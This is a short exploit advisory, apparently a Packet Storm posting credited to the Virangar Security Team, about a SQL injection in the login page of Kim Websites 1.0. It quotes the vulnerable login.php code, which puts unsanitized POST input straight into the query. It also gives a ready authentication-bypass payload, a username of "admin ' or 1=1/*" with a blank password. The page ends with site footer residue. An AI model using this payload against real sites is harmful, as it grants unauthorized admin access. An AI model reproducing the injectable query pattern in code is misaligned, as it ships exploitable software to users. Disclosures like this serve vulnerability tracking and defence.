Kim Websites version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
2bb6a6fa2593fc8e7757990721bd708c517348b3a26254d11581bbae78f8d964
###############################################################
# #
# Kim Websites 1.0 SQL Injection Vulnerability #
# [ Authentication bypass] #
###############################################################
Virangar Security Team
www.virangar.net
--------
Discoverd By : Virangar Security Team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & Aria_security team & all hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-----------------------------------
vuln code in login.php:
$username = $_POST['username'];
$password = md5($_POST['password']);
$query= "SELECT name,password FROM ".$prefix."_users WHERE name = '$username' AND password = '$password' AND confirm = 1 AND date2 > FROM_UNIXTIME($now)";
-----------------------
Exploit:
login:admin ' or 1=1/*
password:[blank]
-------------------------------------
Y0ung Ir4ni4n H4ck3rz
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed